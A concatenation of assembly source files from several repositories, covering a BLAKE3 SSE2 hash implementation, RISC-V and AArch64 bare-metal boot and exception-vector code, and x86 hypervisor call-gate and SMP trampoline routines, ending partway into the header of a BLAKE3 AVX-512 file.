pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pand xmm9, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm8, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm9, xmm8
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
movdqa xmm10, xmm6
pand xmm8, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm10, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm8, xmm10
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
mov eax, r13d
cmp rdx, r15
jne 2b
movups xmmword ptr [rbx], xmm0
movups xmmword ptr [rbx+0x10], xmm1
jmp 4b
.p2align 6
blake3_compress_in_place_sse2:
_blake3_compress_in_place_sse2:
_CET_ENDBR
movups xmm0, xmmword ptr [rdi]
movups xmm1, xmmword ptr [rdi+0x10]
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
shl r8, 32
add rdx, r8
movq xmm3, rcx
movq xmm4, rdx
punpcklqdq xmm3, xmm4
movups xmm4, xmmword ptr [rsi]
movups xmm5, xmmword ptr [rsi+0x10]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [rsi+0x20]
movups xmm7, xmmword ptr [rsi+0x30]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
mov al, 7
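# SSE2 round loop: without pshufb, the 16-bit rotate is done with
# pshuflw/pshufhw 0xB1 (swap the 16-bit halves of each dword) and the 8-bit
# rotate with psrld/pslld/pxor.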
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pand xmm9, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm8, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm9, xmm8
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
movdqa xmm10, xmm6
pand xmm8, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm10, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm8, xmm10
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
movups xmmword ptr [rdi], xmm0
movups xmmword ptr [rdi+0x10], xmm1
ret
.p2align 6
blake3_compress_xof_sse2:
_blake3_compress_xof_sse2:
_CET_ENDBR
movups xmm0, xmmword ptr [rdi]
movups xmm1, xmmword ptr [rdi+0x10]
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movzx eax, r8b
movzx edx, dl
shl rax, 32
add rdx, rax
movq xmm3, rcx
movq xmm4, rdx
punpcklqdq xmm3, xmm4
movups xmm4, xmmword ptr [rsi]
movups xmm5, xmmword ptr [rsi+0x10]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [rsi+0x20]
movups xmm7, xmmword ptr [rsi+0x30]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pand xmm9, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm8, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm9, xmm8
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
movdqa xmm10, xmm6
pand xmm8, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm10, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm8, xmm10
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
movdqu xmm4, xmmword ptr [rdi]
movdqu xmm5, xmmword ptr [rdi+0x10]
pxor xmm0, xmm2
pxor xmm1, xmm3
pxor xmm2, xmm4
pxor xmm3, xmm5
movups xmmword ptr [r9], xmm0
movups xmmword ptr [r9+0x10], xmm1
movups xmmword ptr [r9+0x20], xmm2
movups xmmword ptr [r9+0x30], xmm3
ret
#ifdef __APPLE__
.static_data
#else
.section .rodata
#endif
.p2align 6
BLAKE3_IV:
.long 0x6A09E667, 0xBB67AE85
.long 0x3C6EF372, 0xA54FF53A
ADD0:
.long 0, 1, 2, 3
ADD1:
.long 4, 4, 4, 4
BLAKE3_IV_0:
.long 0x6A09E667, 0x6A09E667, 0x6A09E667, 0x6A09E667
BLAKE3_IV_1:
.long 0xBB67AE85, 0xBB67AE85, 0xBB67AE85, 0xBB67AE85
BLAKE3_IV_2:
.long 0x3C6EF372, 0x3C6EF372, 0x3C6EF372, 0x3C6EF372
BLAKE3_IV_3:
.long 0xA54FF53A, 0xA54FF53A, 0xA54FF53A, 0xA54FF53A
BLAKE3_BLOCK_LEN:
.long 64, 64, 64, 64
CMP_MSB_MASK:
.long 0x80000000, 0x80000000, 0x80000000, 0x80000000
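# SSE2 has no pblendw (an SSE4.1 instruction), so the dword-granular blends
# are emulated with pand/pand/por using the masks below.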
PBLENDW_0x33_MASK:
.long 0xFFFFFFFF, 0x00000000, 0xFFFFFFFF, 0x00000000
PBLENDW_0xCC_MASK:
.long 0x00000000, 0xFFFFFFFF, 0x00000000, 0xFFFFFFFF
PBLENDW_0x3F_MASK:
.long 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0x00000000
PBLENDW_0xC0_MASK:
.long 0x00000000, 0x00000000, 0x00000000, 0xFFFFFFFF
|
Misakait/charlotteos | 1,355 | src/entry.S | # size of each hart's stack is 1024 bytes
# Define each hart's stack size: 1024 bytes here.
.equ STACK_SIZE, 1024
# Declare the _start symbol globally visible, as the program entry point.
.global _start
.text
_start:
# park harts with id != 0
# Put every hart other than hart 0 on standby.
csrr t0, mhartid # read the mhartid CSR to get the current hart's id into t0
mv tp, t0 # back up the hart id from t0 into tp for later use
bnez t0, park # bnez (Branch if Not Equal to Zero): if t0 is non-zero (i.e. the hart id is not 0), jump to the park label
# Setup stacks. The RISC-V stack grows downward (toward lower addresses),
# so we point the stack pointer at the very top (highest address) of each
# hart's stack range.
# Set up the stack for hart 0.
slli t0, t0, 10 # slli (Shift Left Logical Immediate): shift t0 (necessarily 0 here) left by 10 bits.
# 2^10 = 1024, so this is t0 = t0 * 1024; for hart 0, t0 is still 0.
la sp, stacks + STACK_SIZE # la (Load Address): add one stack's size (STACK_SIZE) to the address of the `stacks` label and load the result into sp (the stack pointer).
# This points sp at the end (high address) of the first stack slot.
add sp, sp, t0 # add t0 to sp; for hart 0, t0 is 0, so sp is unchanged.
# (For the other harts, this line would point sp at their own stack slot.)
j rust_main
park:
wfi # wfi (Wait For Interrupt): put this CPU hart into a low-power sleep state until an interrupt wakes it.
j park # the non-zero harts loop here forever, staying on standby 😴
# In the standard RISC-V calling convention, the stack pointer sp
# is always 16-byte aligned.
# Make sure the `stacks` label below is 16-byte aligned; this is good practice and can improve performance.
.balign 16
stacks:
# The .skip directive reserves a block of memory here.
# STACK_SIZE * 8: reserve stack space for 8 harts (1024 * 8 = 8192 bytes).
# This block is the combined stack area for all harts.
.skip STACK_SIZE * 8
.end # end of file
|
MissBiwott25/comprehensive-rust. | 4,676 | src/bare-metal/aps/examples/src/exceptions.S | /*
* Copyright 2023 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* Saves the volatile registers onto the stack. This currently takes
* 14 instructions, so it can be used in exception handlers that still
* have 18 of their 32 vector-slot instructions left.
*
* On return, x0 and x1 are initialised to elr_el2 and spsr_el2
* respectively, which can be used as the first and second arguments
* of a subsequent call.
*/
.macro save_volatile_to_stack
/* Reserve stack space and save registers x0-x18, x29 & x30. */
stp x0, x1, [sp, #-(8 * 24)]!
stp x2, x3, [sp, #8 * 2]
stp x4, x5, [sp, #8 * 4]
stp x6, x7, [sp, #8 * 6]
stp x8, x9, [sp, #8 * 8]
stp x10, x11, [sp, #8 * 10]
stp x12, x13, [sp, #8 * 12]
stp x14, x15, [sp, #8 * 14]
stp x16, x17, [sp, #8 * 16]
str x18, [sp, #8 * 18]
stp x29, x30, [sp, #8 * 20]
/*
* Save elr_el1 & spsr_el1 so that we can take a nested exception
* and still be able to unwind.
*/
mrs x0, elr_el1
mrs x1, spsr_el1
stp x0, x1, [sp, #8 * 22]
.endm
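/*
 * Editor sketch (derived from the stores above, not in the original):
 * the resulting 8 * 24 = 192-byte frame is laid out as
 *   [sp + 8*0]  x0, x1        [sp + 8*2]  x2..x17 (in pairs)
 *   [sp + 8*18] x18           [sp + 8*20] x29, x30
 *   [sp + 8*22] elr_el1, spsr_el1
 * with the slot at [sp + 8*19] left unused.
 */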
/**
* Restores the volatile registers from the stack. This currently
* takes 14 instructions, so it can be used in exception handlers
* while still leaving 18 instructions free; paired with
* save_volatile_to_stack, there are 4 instructions to spare.
*/
.macro restore_volatile_from_stack
/* Restore registers x2-x18, x29 & x30. */
ldp x2, x3, [sp, #8 * 2]
ldp x4, x5, [sp, #8 * 4]
ldp x6, x7, [sp, #8 * 6]
ldp x8, x9, [sp, #8 * 8]
ldp x10, x11, [sp, #8 * 10]
ldp x12, x13, [sp, #8 * 12]
ldp x14, x15, [sp, #8 * 14]
ldp x16, x17, [sp, #8 * 16]
ldr x18, [sp, #8 * 18]
ldp x29, x30, [sp, #8 * 20]
/*
* Restore registers elr_el1 & spsr_el1, using x0 & x1 as scratch.
*/
ldp x0, x1, [sp, #8 * 22]
msr elr_el1, x0
msr spsr_el1, x1
/* Restore x0 & x1, and release stack space. */
ldp x0, x1, [sp], #8 * 24
.endm
/**
* This is a generic handler for exceptions taken at the current EL
* while using SP0. It behaves similarly to the SPx case by first
* switching to SPx, doing the work, then switching back to SP0 before
* returning.
*
* Switching to SPx and calling the Rust handler takes 16
* instructions. To restore and return we need an additional 16
* instructions, so we can implement the whole handler within the
* allotted 32 instructions.
*
*/
.macro current_exception_sp0 handler:req
msr spsel, #1
save_volatile_to_stack
bl \handler
restore_volatile_from_stack
msr spsel, #0
eret
.endm
/**
* This is a generic handler for exceptions taken at the current EL
* while using SPx. It saves volatile registers, calls the Rust
* handler, restores volatile registers, then returns.
*
* This also works for exceptions taken from EL0, if we don't care
* about non-volatile registers.
*
* Saving state and jumping to the Rust handler takes 15 instructions,
* and restoring and returning also takes 15 instructions, so we can
* fit the whole handler in 30 instructions, under the limit of 32.
*/
.macro current_exception_spx handler:req
save_volatile_to_stack
bl \handler
restore_volatile_from_stack
eret
.endm
.section .text.vector_table_el1, "ax"
.global vector_table_el1
.balign 0x800
vector_table_el1:
sync_cur_sp0:
current_exception_sp0 sync_exception_current
.balign 0x80
irq_cur_sp0:
current_exception_sp0 irq_current
.balign 0x80
fiq_cur_sp0:
current_exception_sp0 fiq_current
.balign 0x80
serr_cur_sp0:
current_exception_sp0 serr_current
.balign 0x80
sync_cur_spx:
current_exception_spx sync_exception_current
.balign 0x80
irq_cur_spx:
current_exception_spx irq_current
.balign 0x80
fiq_cur_spx:
current_exception_spx fiq_current
.balign 0x80
serr_cur_spx:
current_exception_spx serr_current
.balign 0x80
sync_lower_64:
current_exception_spx sync_lower
.balign 0x80
irq_lower_64:
current_exception_spx irq_lower
.balign 0x80
fiq_lower_64:
current_exception_spx fiq_lower
.balign 0x80
serr_lower_64:
current_exception_spx serr_lower
.balign 0x80
sync_lower_32:
current_exception_spx sync_lower
.balign 0x80
irq_lower_32:
current_exception_spx irq_lower
.balign 0x80
fiq_lower_32:
current_exception_spx fiq_lower
.balign 0x80
serr_lower_32:
current_exception_spx serr_lower
|
MissBiwott25/comprehensive-rust. | 1,445 | src/bare-metal/aps/examples/src/idmap.S | /*
* Copyright 2023 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
.set .L_TT_TYPE_BLOCK, 0x1
.set .L_TT_TYPE_PAGE, 0x3
.set .L_TT_TYPE_TABLE, 0x3
/* Access flag. */
.set .L_TT_AF, 0x1 << 10
/* Not global. */
.set .L_TT_NG, 0x1 << 11
.set .L_TT_XN, 0x3 << 53
.set .L_TT_MT_DEV, 0x0 << 2 // MAIR #0 (DEV_nGnRE)
.set .L_TT_MT_MEM, (0x1 << 2) | (0x3 << 8) // MAIR #1 (MEM_WBWA), inner shareable
.set .L_BLOCK_DEV, .L_TT_TYPE_BLOCK | .L_TT_MT_DEV | .L_TT_AF | .L_TT_XN
.set .L_BLOCK_MEM, .L_TT_TYPE_BLOCK | .L_TT_MT_MEM | .L_TT_AF | .L_TT_NG
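/*
 * Editor note (values computed from the definitions above, not in the
 * original): .L_BLOCK_MEM evaluates to 0xF05 (block, MEM_WBWA, inner
 * shareable, AF, nG) and .L_BLOCK_DEV to 0x0060000000000401 (block,
 * DEV_nGnRE, AF, XN).
 */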
.section ".rodata.idmap", "a", %progbits
.global idmap
.align 12
idmap:
/* level 1 */
.quad .L_BLOCK_DEV | 0x0 // 1 GiB of device mappings
.quad .L_BLOCK_MEM | 0x40000000 // 1 GiB of DRAM
.fill 254, 8, 0x0 // 254 GiB of unmapped VA space
.quad .L_BLOCK_DEV | 0x4000000000 // 1 GiB of device mappings
.fill 255, 8, 0x0 // 255 GiB of remaining VA space
|
MissBiwott25/comprehensive-rust. | 4,768 | src/bare-metal/aps/examples/src/entry.S | /*
* Copyright 2023 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
.macro adr_l, reg:req, sym:req
adrp \reg, \sym
add \reg, \reg, :lo12:\sym
.endm
.macro mov_i, reg:req, imm:req
movz \reg, :abs_g3:\imm
movk \reg, :abs_g2_nc:\imm
movk \reg, :abs_g1_nc:\imm
movk \reg, :abs_g0_nc:\imm
.endm
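/*
 * Editor sketch (not in the original): mov_i x0, 0x1122334455667788
 * expands to
 *   movz x0, #0x1122, lsl #48
 *   movk x0, #0x3344, lsl #32
 *   movk x0, #0x5566, lsl #16
 *   movk x0, #0x7788
 * via the :abs_g3:/:abs_g2_nc:/:abs_g1_nc:/:abs_g0_nc: relocations.
 */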
.set .L_MAIR_DEV_nGnRE, 0x04
.set .L_MAIR_MEM_WBWA, 0xff
.set .Lmairval, .L_MAIR_DEV_nGnRE | (.L_MAIR_MEM_WBWA << 8)
/* 4 KiB granule size for TTBR0_EL1. */
.set .L_TCR_TG0_4KB, 0x0 << 14
/* 4 KiB granule size for TTBR1_EL1. */
.set .L_TCR_TG1_4KB, 0x2 << 30
/*
* Disable translation table walk for TTBR1_EL1, generating a
* translation fault instead.
*/
.set .L_TCR_EPD1, 0x1 << 23
/* Translation table walks for TTBR0_EL1 are inner sharable. */
.set .L_TCR_SH_INNER, 0x3 << 12
/*
* Translation table walks for TTBR0_EL1 are outer write-back
* read-allocate write-allocate cacheable.
*/
.set .L_TCR_RGN_OWB, 0x1 << 10
/*
* Translation table walks for TTBR0_EL1 are inner write-back
* read-allocate write-allocate cacheable.
*/
.set .L_TCR_RGN_IWB, 0x1 << 8
/* Size offset for TTBR0_EL1 is 2**39 bytes (512 GiB). */
.set .L_TCR_T0SZ_512, 64 - 39
.set .Ltcrval, .L_TCR_TG0_4KB | .L_TCR_TG1_4KB | .L_TCR_EPD1 | .L_TCR_RGN_OWB
.set .Ltcrval, .Ltcrval | .L_TCR_RGN_IWB | .L_TCR_SH_INNER | .L_TCR_T0SZ_512
/* Stage 1 instruction access cacheability is unaffected. */
.set .L_SCTLR_ELx_I, 0x1 << 12
/* SP alignment fault if SP is not aligned to a 16 byte boundary. */
.set .L_SCTLR_ELx_SA, 0x1 << 3
/* Stage 1 data access cacheability is unaffected. */
.set .L_SCTLR_ELx_C, 0x1 << 2
/* EL0 and EL1 stage 1 MMU enabled. */
.set .L_SCTLR_ELx_M, 0x1 << 0
/*
* Privileged Access Never is unchanged on taking an exception to EL1.
*/
.set .L_SCTLR_EL1_SPAN, 0x1 << 23
/* SETEND instruction disabled at EL0 in aarch32 mode. */
.set .L_SCTLR_EL1_SED, 0x1 << 8
/* Various IT instructions are disabled at EL0 in aarch32 mode. */
.set .L_SCTLR_EL1_ITD, 0x1 << 7
.set .L_SCTLR_EL1_RES1, (0x1 << 11) | (0x1 << 20) | (0x1 << 22) | (0x1 << 28) | (0x1 << 29)
.set .Lsctlrval, .L_SCTLR_ELx_M | .L_SCTLR_ELx_C | .L_SCTLR_ELx_SA | .L_SCTLR_EL1_ITD | .L_SCTLR_EL1_SED
.set .Lsctlrval, .Lsctlrval | .L_SCTLR_ELx_I | .L_SCTLR_EL1_SPAN | .L_SCTLR_EL1_RES1
// ANCHOR: entry
/**
* This is a generic entry point for an image. It carries out the
* operations required to prepare the loaded image to be run.
* Specifically, it
*
* - sets up the MMU with an identity map of virtual to physical
* addresses, and enables caching
* - enables floating point
* - zeroes the bss section (the code below uses x29 and x30 for this)
* - prepares the stack, pointing to a section within the image
* - sets up the exception vector
* - branches to the Rust `main` function
*
* It preserves x0-x3 for the Rust entry point, as these may contain
* boot parameters.
*/
.section .init.entry, "ax"
.global entry
entry:
/*
* Load and apply the memory management configuration, ready to
* enable MMU and caches.
*/
adrp x30, idmap
msr ttbr0_el1, x30
mov_i x30, .Lmairval
msr mair_el1, x30
mov_i x30, .Ltcrval
/* Copy the supported PA range into TCR_EL1.IPS. */
mrs x29, id_aa64mmfr0_el1
bfi x30, x29, #32, #4
msr tcr_el1, x30
mov_i x30, .Lsctlrval
/*
* Ensure everything before this point has completed, then
* invalidate any potentially stale local TLB entries before they
* start being used.
*/
isb
tlbi vmalle1
ic iallu
dsb nsh
isb
/*
* Configure sctlr_el1 to enable MMU and cache and don't proceed
* until this has completed.
*/
msr sctlr_el1, x30
isb
/* Disable trapping floating point access in EL1. */
mrs x30, cpacr_el1
orr x30, x30, #(0x3 << 20)
msr cpacr_el1, x30
isb
/* Zero out the bss section. */
adr_l x29, bss_begin
adr_l x30, bss_end
0: cmp x29, x30
b.hs 1f
stp xzr, xzr, [x29], #16
b 0b
1: /* Prepare the stack. */
adr_l x30, boot_stack_end
mov sp, x30
/* Set up exception vector. */
adr x30, vector_table_el1
msr vbar_el1, x30
/* Call into Rust code. */
bl main
/* Loop forever waiting for interrupts. */
2: wfi
b 2b
|
mit-enclaves/argos-monitor | 1,088 | crates/bricks/src/x86_64/entry.S | .text
// Take a capa_index_t* and a void**, expected to be in rdi, rsi.
.globl asm_call_gate
asm_call_gate:
pushq %rbp
pushq %rbx
pushq %rcx
pushq %rdx
pushq %r10
pushq %r11
pushq %r12
pushq %r13
pushq %r14
pushq %r15
pushfq
// Now do the call, arguments are in the right registers.
pushq %rdi
pushq %rsi
movq (%rdi), %rdi
movq (%rsi), %rsi
movq $9, %rax // TYCHE_SWITCH
vmcall
// We returned, move the return values into the registers.
popq %r15 // &rsi, i.e., void**
movq %rsi, (%r15)
popq %r15 // &rdi, i.e., capa_index_t*
movq %rdi, (%r15)
// Restore all registers, don't change rax.
popfq
popq %r15
popq %r14
popq %r13
popq %r12
popq %r11
popq %r10
popq %rdx
popq %rcx
popq %rbx
popq %rbp
ret
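// Editor sketch (assumption, not from this file): given the register
// usage documented above, the matching SysV C prototype would be roughly
//     void asm_call_gate(capa_index_t *capa, void **args);
// with the vmcall's results written back through both pointers, as the
// pops into (%r15) above show.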
.globl bricks_start
bricks_start:
movq %r11, %rsi
// Align the stack to 16 bytes; a misaligned stack previously caused a bug with xmm registers.
andl $-16, %esp
callq bricks_trusted_main
// Should never return here, call exit if we do.
movq $1, %rax
vmcall
|
mit-enclaves/argos-monitor | 3,305 | monitor/first-stage/src/smp/trampoline.S | # Upon receiving a SIPI from BSP, the AP starts in real mode with CS:IP set to XY00:0000.
# The assembly here tries to enter long mode directly from real mode (skipping protected mode)
#
# Useful links:
# - https://wiki.osdev.org/Symmetric_Multiprocessing#AP_Initialization_Code
# - https://wiki.osdev.org/Entering_Long_Mode_Directly
# - https://stackoverflow.com/questions/36968829/how-to-switch-from-real-mode-to-protected-mode-after-bootloader
# Special thanks to: https://github.com/rcore-os/x86-smpboot
.equ start_addr, 0x7000
.equ ap_trampoline64_start_paddr, start_addr + ap_trampoline64_start - ap_trampoline_start
.equ gdt_64_paddr, start_addr + gdt_64 - ap_trampoline_start
.equ gdt_64_ptr_paddr, start_addr + gdt_64_ptr - ap_trampoline_start
.equ CR0_PE, (1 << 0)
.equ CR0_PG, (1 << 31)
.equ CR4_PAE, (1 << 5)
.equ CR4_PGE, (1 << 7)
.equ EFER_LME, (1 << 8)
.equ EFER_NXE, (1 << 11)
.equ EFER_SCE, (1 << 0)
.global ap_trampoline_start
.global ap_trampoline_end
.equ cr3_ptr, start_addr + 0x0ff8
.equ entry_ptr, start_addr + 0x0ff0
.equ stack_ptr, start_addr + 0x0fe8
.equ temp_stack_ptr, start_addr + 0x0fe0
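# Editor note (not in the original): these four slots sit at the top of
# the 0x7000 trampoline page (0x7ff8, 0x7ff0, 0x7fe8, 0x7fe0); the BSP
# presumably fills in the page-table root, entry point and stacks there
# before sending the SIPI.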
.text
.code16 # 16-bit mode
ap_trampoline_start:
# disable BIOS enabled interrupts
cli
# write back and invalidate cache
wbinvd
# zero out data segment registers DS, ES, and SS
xor ax, ax # ax
mov ds, ax # data segment
mov es, ax # extra segment
mov ss, ax # stack segment
# load idt with 0, 0 so that any NMI will cause a triple fault
# mov eax, idt_zero
# lidt [eax]
# cr4: enable PAE and PGE (0xa0)
mov eax, cr4
or eax, 0xa0
mov cr4, eax
# load cr3
mov eax, cr3_ptr
mov eax, [eax]
mov cr3, eax
# EFER: enable LME and NXE
mov ecx, 0xC0000080
rdmsr
or eax, EFER_LME | EFER_NXE | EFER_SCE
wrmsr
# cr0: enable PE and PG (CR0_PE | CR0_PG)
mov eax, 1
shl eax, 31
or eax, 1
mov ebx, cr0
or ebx, eax
mov cr0, ebx
# lgdt: load 64-bit GDT
lgdt [gdt_64_ptr_paddr]
# esp: point to temporary stack
mov esp, temp_stack_ptr
# jump to long mode directly
push 0x8
lea eax, [ap_trampoline64_start_paddr]
push eax
retf
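# Editor note (not in the original): the push/push/retf sequence acts as
# a far jump: retf pops EIP then CS, loading CS with selector 0x8 (the
# 64-bit code descriptor in gdt_64) and resuming at
# ap_trampoline64_start in long mode.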
.code64
ap_trampoline64_start:
# zero out segment registers DS, ES, FS, GS, and SS
xor ax, ax
mov ds, ax
mov es, ax
mov fs, ax
mov gs, ax
mov ss, ax
# enter the entry function
mov rsp, [stack_ptr]
mov rax, [entry_ptr]
call rax
spin_hlt:
hlt
jmp spin_hlt
gdt_64:
.quad 0x0000000000000000 # NULL-segment descriptor (mandatory)
.quad 0x00209A0000000000 # Code segment descriptor (required to switch to protected mode)
.quad 0x0000920000000000 # Data segment descriptor (access data in memory after switching to protected mode)
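# Editor note (not in the original): 0x00209A0000000000 decodes to access
# byte 0x9A (present, DPL 0, execute/read code) with the L bit set in the
# 0x2 flags nibble, i.e. a 64-bit code segment; base and limit are
# ignored in long mode.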
.align 4
.word 0 # Padding to make the address of the GDT aligned on a 4-byte boundary
gdt_64_ptr:
.word gdt_64_ptr - gdt_64 - 1 # 16-bit Size (Limit) of GDT.
.long gdt_64_paddr # 32-bit Base Address of GDT. (CPU will zero extend to 64-bit)
ap_trampoline_end:
|
mit-enclaves/argos-monitor | 1,061 | C/libraries/sdktyche/runtime/asm.S | #if defined CONFIG_X86 || defined(__x86_64__)
.text
// Take a capa_index_t* and a void**, expected to be in rdi, rsi.
.globl asm_call_gate
asm_call_gate:
pushq %rbp
pushq %rbx
pushq %rcx
pushq %rdx
pushq %r10
pushq %r11
pushq %r12
pushq %r13
pushq %r14
pushq %r15
pushfq
// Now do the call, arguments are in the right registers.
//pushq %rdi
//pushq %rsi
//movq (%rdi), %rdi
//movq (%rsi), %rsi
movq $8, %rax // TYCHE_SWITCH
vmcall
// We returned, move the return values into the registers.
//popq %r15 // &rsi, i.e., void**
//movq %rsi, (%r15)
//popq %r15 // &rdi, i.e., capa_index_t*
//movq %rdi, (%r15)
// Restore all registers, don't change rax.
popfq
popq %r15
popq %r14
popq %r13
popq %r12
popq %r11
popq %r10
popq %rdx
popq %rcx
popq %rbx
popq %rbp
ret
.globl _start
_start:
//movq %r11, %rsi
callq trusted_main
// Should never return here, call exit if we do.
movq $1, %rax
vmcall
#endif
|
mit-enclaves/argos-monitor | 161,672 | C/libraries/sdktyche/loader/blake3_avx512_x86-64_unix.S | #if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",%progbits
#endif
#if defined(__ELF__) && defined(__CET__) && defined(__has_include)
#if __has_include(<cet.h>)
#include <cet.h>
#endif
#endif
#if !defined(_CET_ENDBR)
#define _CET_ENDBR
#endif
.intel_syntax noprefix
.global _blake3_hash_many_avx512
.global blake3_hash_many_avx512
.global blake3_compress_in_place_avx512
.global _blake3_compress_in_place_avx512
.global blake3_compress_xof_avx512
.global _blake3_compress_xof_avx512
.global blake3_xof_many_avx512
.global _blake3_xof_many_avx512
